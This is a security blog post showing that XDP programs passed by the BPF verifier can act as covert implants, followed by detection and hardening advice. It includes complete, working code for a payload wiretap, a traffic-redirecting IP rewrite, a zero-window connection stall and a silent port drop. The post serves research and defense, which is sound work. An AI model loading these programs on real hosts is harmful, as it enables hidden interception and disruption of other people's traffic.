Verified, Not Safe: XDP Programs the Kernel Trusts

005 · 2026-05-13 · the BPF verifier guarantees memory safety, not intent

I wrote an XDP program last week. Loaded it with bpf_prog_load, attached it to eth0. The verifier walked every path through the bytecode, checked my bounds, checked my helper calls, and accepted it. Clean load.

I ran bpftool prog list and there it was—sitting alongside systemd's cgroup programs and the container runtime's socket filters. One more entry in a list of twenty. If you scrolled past it, you'd assume it was a monitoring tool. Some observability thing. It wasn't. It was copying the first 128 bytes of every TCP payload into a ring buffer.

The verifier didn't flag it. It couldn't. The verifier's job is to prove my program won't crash the kernel. It doesn't have an opinion about what I do with packet data once I've proven I'll access it safely.

All of this requires root, or CAP_BPF plus CAP_NET_ADMIN on kernel 5.8 and later. An attacker with root can already load kernel modules, ptrace processes, and rewrite binaries. But BPF is different in one way: it looks normal. A kernel module shows up in lsmod. A modified binary fails a hash check. A BPF program sits in a list of twenty other BPF programs and looks identical to the one next to it.

I wanted to understand where the line actually is.

Four programs the verifier loves

All four compile with clang -O2 -target bpf. All four load cleanly.

[Figure: one sample packet, field by field: Ethernet (dst MAC), src IP 10.0.1.1, dst IP 10.0.1.100, dport 4443, window 14600, payload "GET /api/secret.."]

Each program touches a different part of the same packet.

Silent drop

XDP runs before the kernel allocates an sk_buff. Return XDP_DROP for packets matching a destination port: no socket buffer, no netfilter hook, nothing for tcpdump to see. I sent traffic to port 4443 and watched tcpdump. Nothing. Not a SYN, not a RST. The only evidence was ethtool -S counters—the NIC saw the packets, the kernel didn't.
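
The drop program is the only one of the four without a listing. What follows is a minimal sketch of the decision logic such a program needs, not the exact code from the test. It is written as a plain C function so it can be exercised in userspace; in an XDP program the same body would sit under SEC("xdp") and take data and data_end from the xdp_md context. DROP_PORT, drop_verdict and build_frame are names made up for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>      /* htons; IPPROTO_TCP via netinet/in.h */
#include <linux/bpf.h>      /* XDP_DROP, XDP_PASS */
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>

#define DROP_PORT 4443      /* assumed: the port from the packet figure */

/* Same shape as an XDP program body: bounds-check every header
 * against data_end before reading it, then return a verdict. */
static int drop_verdict(void *data, void *data_end)
{
    assert(data != NULL && data_end != NULL);

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP || ip->ihl < 5)
        return XDP_PASS;

    struct tcphdr *tcp = (void *)((uint8_t *)ip + ip->ihl * 4);
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    return tcp->dest == htons(DROP_PORT) ? XDP_DROP : XDP_PASS;
}

/* Hypothetical test helper: write a minimal Ethernet/IPv4/TCP frame
 * into buf and return its length in bytes. */
static size_t build_frame(uint8_t *buf, uint16_t dport)
{
    struct ethhdr eth = { .h_proto = htons(ETH_P_IP) };
    struct iphdr  ip  = { .version = 4, .ihl = 5, .protocol = IPPROTO_TCP };
    struct tcphdr tcp = { .dest = htons(dport), .doff = 5 };

    memcpy(buf, &eth, sizeof eth);
    memcpy(buf + sizeof eth, &ip, sizeof ip);
    memcpy(buf + sizeof eth + sizeof ip, &tcp, sizeof tcp);
    return sizeof eth + sizeof ip + sizeof tcp;
}
```

A frame built with build_frame(buf, 4443) gets XDP_DROP; any other port, or a frame too short to hold the headers, gets XDP_PASS. When trying this in userspace, start the frame 2 bytes past a 4-byte boundary so the IP and TCP headers land aligned.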

Passive wiretap

The drop program was visible in one way: the connection failed. The client knew something was wrong. So I tried the opposite—what if traffic flows normally and I just watch?

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 20);  /* 1 MB */
} tap_rb SEC(".maps");

SEC("xdp")
int xdp_tap(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    __u32 ip_hlen = ip->ihl * 4;
    struct tcphdr *tcp = (void *)ip + ip_hlen;
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    __u32 tcp_hlen = tcp->doff * 4;
    void *payload = (void *)tcp + tcp_hlen;
    if (payload >= data_end)
        return XDP_PASS;

    __u32 tcp_hdr_off = (void *)tcp - data;
    __u32 pay_off = tcp_hdr_off + tcp_hlen;
    if (pay_off + 128 > (__u32)(data_end - data))
        return XDP_PASS;

    void *buf = bpf_ringbuf_reserve(&tap_rb, 128, 0);
    if (!buf)
        return XDP_PASS;

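    /* If the copy fails, discard the reservation rather than
     * submitting 128 bytes of uninitialized ring-buffer memory. */
    if (bpf_xdp_load_bytes(ctx, pay_off, buf, 128) < 0) {
        bpf_ringbuf_discard(buf, 0);
        return XDP_PASS;
    }
    bpf_ringbuf_submit(buf, 0);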

    return XDP_PASS;
}

This one returns XDP_PASS. Traffic flows normally. Nobody's connection breaks. But every TCP payload gets its first 128 bytes copied into a BPF_MAP_TYPE_RINGBUF before the kernel's network stack even touches it. A userspace process reads the ring buffer at its leisure.

I checked. ss didn't show it. lsof didn't show it. There's no file descriptor, no socket, no entry in /proc/net. The data path is entirely kernel-internal: XDP hook → ring buffer → mmap'd read. The only evidence is a map in bpftool map list that you'd have to think to look for.

Header rewrite

This is the one that surprised me. Not because it's complicated—because it's identical to legitimate infrastructure code.

I rewrote the destination IP, recomputed the checksum with the RFC 1624 incremental update, and called bpf_redirect to send the packet out a different interface.

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <arpa/inet.h>

#define ORIG_DST  0x0A000164  /* 10.0.1.100 */
#define NEW_DST   0x0A000265  /* 10.0.2.101 */
#define OUT_IFIDX 4

static __always_inline void
update_csum(__u16 *csum, __be32 old_val, __be32 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
           + (~((__u32)old_val >> 16) & 0xFFFF)
           + (~(__u32)old_val          & 0xFFFF)
           + ((__u32)new_val >> 16)
           + ((__u32)new_val & 0xFFFF);
    s = (s & 0xFFFF) + (s >> 16);
    s = (s & 0xFFFF) + (s >> 16);
    *csum = (__u16)~s;
}

SEC("xdp")
int xdp_redirect_rewrite(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;

    if (ip->daddr != htonl(ORIG_DST))
        return XDP_PASS;

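    __be32 old_dst = ip->daddr;
    ip->daddr = htonl(NEW_DST);
    /* Only the IPv4 header checksum is patched here. TCP and UDP
     * checksums also cover the destination address (pseudo-header),
     * so a complete rewrite would update the L4 checksum the same way. */
    update_csum(&ip->check, old_dst, ip->daddr);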

    return bpf_redirect(OUT_IFIDX, 0);
}

From the sender's side, everything looked normal. Packet left, ACK came back. From the original destination's side, the connection never happened. The packet showed up on a different interface, heading to a different host entirely.

If you diffed this against Cilium's XDP datapath or Facebook's Katran, the structure is the same. Parse headers, match a condition, rewrite an IP, update the checksum, redirect. The code that load-balances your production traffic and the code that silently reroutes it to an attacker's box use the same helpers, the same bounds checks, the same checksum fold. There is no syntactic tell.
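
The incremental update in update_csum follows RFC 1624: HC' = ~(~HC + ~m + m'). One way to convince yourself it is right is to compare it with a full recompute over a sample header. The sketch below does that in userspace C. The header bytes and the names csum_full, csum_update32 and rewrite_matches_recompute are assumptions for illustration; values are handled as big-endian 16-bit words read byte by byte, so the result does not depend on host endianness.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Full one's-complement checksum (RFC 1071) over an even number of bytes. */
static uint16_t csum_full(const uint8_t *p, size_t len)
{
    uint32_t s = 0;

    assert(len % 2 == 0);
    for (size_t i = 0; i < len; i += 2)
        s += (uint32_t)p[i] << 8 | p[i + 1];
    while (s >> 16)
        s = (s & 0xFFFF) + (s >> 16);
    return (uint16_t)~s;
}

/* RFC 1624 incremental update for one 32-bit field, treated as
 * two 16-bit words: HC' = ~(~HC + ~m + m'). */
static uint16_t csum_update32(uint16_t hc, uint32_t old_val, uint32_t new_val)
{
    uint32_t s = (uint16_t)~hc;

    s += (uint16_t)~(old_val >> 16);
    s += (uint16_t)~old_val;
    s += new_val >> 16;
    s += new_val & 0xFFFF;
    s = (s & 0xFFFF) + (s >> 16);   /* fold carries twice */
    s = (s & 0xFFFF) + (s >> 16);
    return (uint16_t)~s;
}

/* Rewrite dst 10.0.1.100 -> 10.0.2.101 in a sample IPv4 header and
 * return 1 if the incremental result equals a full recompute. */
static int rewrite_matches_recompute(void)
{
    uint8_t h[20] = {
        0x45, 0x00, 0x00, 0x3c, 0x1c, 0x46, 0x40, 0x00,
        0x40, 0x06, 0x00, 0x00,     /* ttl 64, proto TCP, checksum 0 */
        10, 0, 1, 1,                /* src 10.0.1.1   */
        10, 0, 1, 100,              /* dst 10.0.1.100 */
    };
    uint16_t hc  = csum_full(h, sizeof h);
    uint16_t inc = csum_update32(hc, 0x0A000164, 0x0A000265);

    h[18] = 2;                      /* dst becomes 10.0.2.101 */
    h[19] = 101;
    return inc == csum_full(h, sizeof h);
}
```

For this header the checksum moves from 0x0812 to 0x0711 by either route. The same update works on a TCP or UDP checksum, which covers the destination address through the pseudo-header.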

TCP window zero

I didn't drop anything. I didn't redirect anything. I changed a single field: the TCP window size. Set it to zero on incoming ACKs from a target port. XDP runs on ingress, so when the server on port 8080 sends an ACK back, the XDP program rewrites its window field to zero before the local TCP stack reads it. The local stack sees a zero window and enters persist mode per RFC 1122 §4.2.2.17: it stops sending data and only probes the window periodically. The connection stays open. No RST, no FIN. netstat shows ESTABLISHED. Everything looks healthy. The data just stops flowing.

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <arpa/inet.h>

#define TARGET_PORT 8080

static __always_inline void
update_tcp_csum(__u16 *csum, __u16 old_val, __u16 new_val) {
    __u32 s = (~(__u32)*csum & 0xFFFF)
           + (~(__u32)old_val  & 0xFFFF)
           + (__u32)new_val;
    s = (s & 0xFFFF) + (s >> 16);
    *csum = ~((__u16)s + (__u16)(s >> 16));
}

SEC("xdp")
int xdp_zero_window(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end)
        return XDP_PASS;
    if (eth->h_proto != htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end)
        return XDP_PASS;
    if (ip->protocol != IPPROTO_TCP)
        return XDP_PASS;

    struct tcphdr *tcp = (void *)ip + (ip->ihl * 4);
    if ((void *)(tcp + 1) > data_end)
        return XDP_PASS;

    if (tcp->source != htons(TARGET_PORT))
        return XDP_PASS;
    if (!tcp->ack)
        return XDP_PASS;

    __u16 old_win = tcp->window;
    tcp->window = 0;
    update_tcp_csum(&tcp->check, old_win, 0);

    return XDP_PASS;
}

The kernel's TCP stack doesn't know. XDP rewrote the incoming window field before the TCP code ever read it. The local side thinks the server's receive window is zero, so it stops sending. ss locally shows the send queue growing. Nobody dropped a packet. The connection is just frozen, waiting for a window update that arrives with the right value—but gets rewritten to zero again every time.

I sat there watching the send queue climb. A connection stall with nothing obviously wrong on either side. No packet loss. No errors. Just a frozen pipe.

All four programs pass the verifier. All four are structurally identical to things you'd find in production—a load balancer rewrites headers, a firewall drops ports, a monitoring tool reads payloads, a traffic shaper adjusts windows. Same SEC("xdp"), same bounds checks, same helper calls. The only difference is what's on the other side of the ring buffer, or which IP address you're rewriting to, or why you picked that port number.

[Figure: packet path NIC → XDP → TCP stack → app, with side exits to the ring buffer and to eth1.]

Same hook, same verifier, four different intents.

The haystack

After loading my wiretap program, I ran bpftool prog list to see what it looked like from the outside. I'd been testing on a Kubernetes node running Cilium, so there were already a lot of BPF programs loaded. This is what I saw:

$ bpftool prog list
6: cgroup_device  tag a0d4b9c1d1f9  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 504B  jited 309B  memlock 4096B
11: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
12: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:31:02+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
58: cgroup_device  tag ee0e253c78993a24  gpl
    loaded_at 2026-05-12T08:31:14+0000  uid 0
    xlated 416B  jited 255B  memlock 4096B
173: xdp  tag 8f06c7a58c442bc7  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 1392B  jited 788B  memlock 4096B
    map_ids 14,15
174: sched_cls  tag 3bc7abe41cce68c5  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 17968B  jited 9728B  memlock 20480B
    map_ids 14,15,16,17
175: sched_cls  tag 9a5b24def40c6967  gpl
    loaded_at 2026-05-12T08:32:01+0000  uid 0
    xlated 22120B  jited 12043B  memlock 24576B
    map_ids 14,15,16,17,18
212: xdp  tag 5a3c0f0c4a3d7e9b  gpl
    loaded_at 2026-05-12T09:14:33+0000  uid 0
    xlated 864B  jited 492B  memlock 4096B
    map_ids 21
340: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:33:19+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
341: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-05-12T08:33:19+0000  uid 0
    xlated 64B  jited 54B  memlock 4096B
389: cgroup_device  tag a2b450ee44e80e5e  gpl
    loaded_at 2026-05-12T08:33:44+0000  uid 0
    xlated 504B  jited 309B  memlock 4096B
415: sched_cls  tag 7e21c72519aa452a  gpl
    loaded_at 2026-05-12T08:34:02+0000  uid 0
    xlated 4200B  jited 2311B  memlock 4096B
    map_ids 14,15,16
472: tracepoint  tag b0f0e9ea03d4acba  gpl
    loaded_at 2026-05-12T08:35:11+0000  uid 0
    xlated 1288B  jited 703B  memlock 4096B
    map_ids 29
511: xdp  tag e4f8c3a21d9b6f07  gpl
    loaded_at 2026-05-12T10:41:57+0000  uid 0
    xlated 712B  jited 401B  memlock 4096B
    map_ids 34

My wiretap is one of those entries. Which one?

They all have the same fields: type, tag hash, bytecode size, map IDs. Nothing distinguishes the implant from the rest.

I tried bpftool net list—that at least shows which programs are attached to which interfaces:

$ bpftool net list
xdp:
eth0(2) driver id 173
veth7a3f(8) generic id 212
eth1(3) driver id 511

tc:
eth0(2) clsact/ingress bpf_lxc id 174 tag 3bc7abe41cce68c5
eth0(2) clsact/egress bpf_lxc id 175 tag 9a5b24def40c6967

Better. But legitimate XDP programs attach to interfaces too. Cilium's datapath is on eth0. A network policy enforcer lives on a veth. A traffic monitor sits on eth1. My wiretap is on one of these interfaces and it looks exactly like the others.

Reading the bytecode

The only real way to know what a program does is to read it. I dumped the bytecode of my wiretap.

[Interactive listing: the wiretap's 27 BPF instructions. Standard parsing is shown in grey; the tells are highlighted in copper.]

If you know what you're looking at, the tells are there. But I had to know to look for those patterns. And I wrote the program. If I were looking at someone else's bytecode—one of thirty programs on a production node, each with hundreds of instructions—would I spot the bpf_ringbuf_reserve buried in a flow that looks like a standard packet filter?
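
Part of that search can be mechanized. The sketch below scans an instruction array for calls to helpers that export data or redirect packets. It assumes unloaded bytecode, as found in the object file, where a helper call's imm field holds the helper ID; as far as I understand, in an xlated dump the kernel has already replaced that field and bpftool resolves the name for you. struct insn mirrors struct bpf_insn from linux/bpf.h, the IDs are copied from enum bpf_func_id, and tell_name and count_tells are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One eBPF instruction; mirrors struct bpf_insn in linux/bpf.h. */
struct insn {
    uint8_t code;           /* opcode */
    uint8_t dst_reg : 4;
    uint8_t src_reg : 4;
    int16_t off;
    int32_t imm;            /* helper ID when the insn is a helper call */
};

#define OP_CALL 0x85        /* BPF_JMP | BPF_CALL */

/* Helper IDs as listed in enum bpf_func_id; check them against the
 * linux/bpf.h on your system before relying on this. */
enum {
    FN_REDIRECT          = 23,
    FN_PERF_EVENT_OUTPUT = 25,
    FN_RINGBUF_OUTPUT    = 130,
    FN_RINGBUF_RESERVE   = 131,
    FN_XDP_LOAD_BYTES    = 189,
};

/* Name of a helper worth a second look, or NULL for anything else. */
static const char *tell_name(int32_t id)
{
    switch (id) {
    case FN_REDIRECT:          return "bpf_redirect";
    case FN_PERF_EVENT_OUTPUT: return "bpf_perf_event_output";
    case FN_RINGBUF_OUTPUT:    return "bpf_ringbuf_output";
    case FN_RINGBUF_RESERVE:   return "bpf_ringbuf_reserve";
    case FN_XDP_LOAD_BYTES:    return "bpf_xdp_load_bytes";
    default:                   return NULL;
    }
}

/* Count helper calls in prog[0..n) that match the list above. */
static size_t count_tells(const struct insn *prog, size_t n)
{
    size_t hits = 0;

    assert(prog != NULL || n == 0);
    for (size_t i = 0; i < n; i++) {
        /* src_reg 0 is a helper call; 1 is a BPF-to-BPF call and
         * 2 a kfunc call, where imm means something else. */
        if (prog[i].code == OP_CALL && prog[i].src_reg == 0 &&
            tell_name(prog[i].imm) != NULL)
            hits++;
    }
    return hits;
}
```

A hit is not a verdict. Cilium and Katran call these helpers too, so the count only narrows down where to start reading.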

It gets worse. bpftool prog dump jited id 212 gives you the JIT'd native x86 instead of BPF bytecode. Now you're reading mov and call instructions with hex addresses. Even less readable.

Most teams never look at any of this. The programs load, traffic flows, dashboards stay green.

Hardening

So what do you actually do about this?

kernel.unprivileged_bpf_disabled: the baseline. Since kernel 5.16 the default config (CONFIG_BPF_UNPRIV_DEFAULT_OFF=y) ships it as 2, which blocks unprivileged loading until an admin changes it; 1 blocks it until reboot. With either value, only CAP_BPF or root can load programs. If you're running anything older, set it now. Doesn't solve the problem described above, but shrinks the surface.

BPF LSM hooks: this is the more interesting one. Linux 5.7+ lets you write BPF programs that gate other BPF programs, provided the kernel is built with CONFIG_BPF_LSM and bpf is in the active LSM list. You attach a policy to the bpf LSM hook that checks program type, attach target, or the calling process before allowing bpf_prog_load. SELinux has a bpf object class for the same purpose; AppArmor, as far as I know, only mediates the capabilities involved. So you can say "only Cilium's binary, signed by this key, can load XDP programs on eth0." Everything else gets rejected at load time.

Signed BPF programs: there's been work toward loading programs signed against a keyring, where the loader checks the signature before the verifier even runs. Not fully mainlined yet, but it's the direction things are heading.

Baseline diffing: the simplest approach, and probably the most underused. Snapshot what's loaded, compare periodically:

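# snapshot loaded programs and interface attachments, one file each
# (two JSON documents appended to one file never diff cleanly)
bpftool prog list --json | jq -S . > /var/log/bpf-prog-baseline.json
bpftool net list --json  | jq -S . > /var/log/bpf-net-baseline.json

# later: diff the current state against each snapshot
diff /var/log/bpf-prog-baseline.json <(bpftool prog list --json | jq -S .)
diff /var/log/bpf-net-baseline.json  <(bpftool net list --json  | jq -S .)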

Detection command	What it reveals
`bpftool prog list`	All loaded programs, type, size, maps
`bpftool net list`	XDP and TC attachments per interface
`bpftool prog dump xlated id N`	BPF bytecode disassembly
`bpftool prog dump jited id N`	Native x86/ARM assembly
`bpftool map list`	All maps—look for unexpected ringbufs
`sysctl kernel.unprivileged_bpf_disabled`	Whether unprivileged users can load BPF
`ausearch -k bpf`	Audit log of bpf() syscalls (needs an audit rule on the bpf syscall tagged with key bpf)

None of these tell you what a program does. They tell you what's loaded. That gap—between knowing what's present and knowing what it's doing—is the whole problem.

Reading:

Guillaume Fournier: With Friends Like eBPF, Who Needs Enemies? (Black Hat USA 2021, ebpfkit)
Brendan Gregg: BPF Performance Tools
Kernel docs: BPF LSM
bpftool(8) man page